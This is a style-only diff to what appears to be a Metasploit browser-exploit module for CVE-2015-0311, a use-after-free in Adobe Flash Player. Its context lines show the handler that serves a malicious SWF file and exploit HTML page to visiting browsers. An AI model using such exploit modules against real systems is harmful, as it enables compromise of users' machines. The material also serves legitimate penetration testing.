@@ -33,7 +33,7 @@ def initialize(info={})
33
33
[ 'CVE' , '2015-0311' ] ,
34
34
[ 'URL' , 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html' ] ,
35
35
[ 'URL' , 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/' ] ,
36
- [ 'URL' , 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ]
36
+ [ 'URL' , 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ]
37
37
] ,
38
38
'Payload' =>
39
39
{
@@ -66,12 +66,12 @@ def on_request_exploit(cli, request, target_info)
66
66
print_status ( "Request: #{ request . uri } " )
67
67
68
68
if request . uri =~ /\. swf$/
69
- print_status ( " Sending SWF..." )
69
+ print_status ( ' Sending SWF...' )
70
70
send_response ( cli , @swf , { 'Content-Type' => 'application/x-shockwave-flash' , 'Cache-Control' => 'no-cache, no-store' , 'Pragma' => 'no-cache' } )
71
71
return
72
72
end
73
73
74
- print_status ( " Sending HTML..." )
74
+ print_status ( ' Sending HTML...' )
75
75
send_exploit_html ( cli , exploit_template ( cli , target_info ) , { 'Pragma' => 'no-cache' } )
76
76
end
77
77
@@ -98,7 +98,7 @@ def exploit_template(cli, target_info)
98
98
end
99
99
100
100
def create_swf
101
- path = ::File . join ( Msf ::Config . data_directory , " exploits" , " CVE-2015-0311" , " msf.swf" )
101
+ path = ::File . join ( Msf ::Config . data_directory , ' exploits' , ' CVE-2015-0311' , ' msf.swf' )
102
102
swf = ::File . open ( path , 'rb' ) { |f | swf = f . read }
103
103
104
104
swf
0 commit comments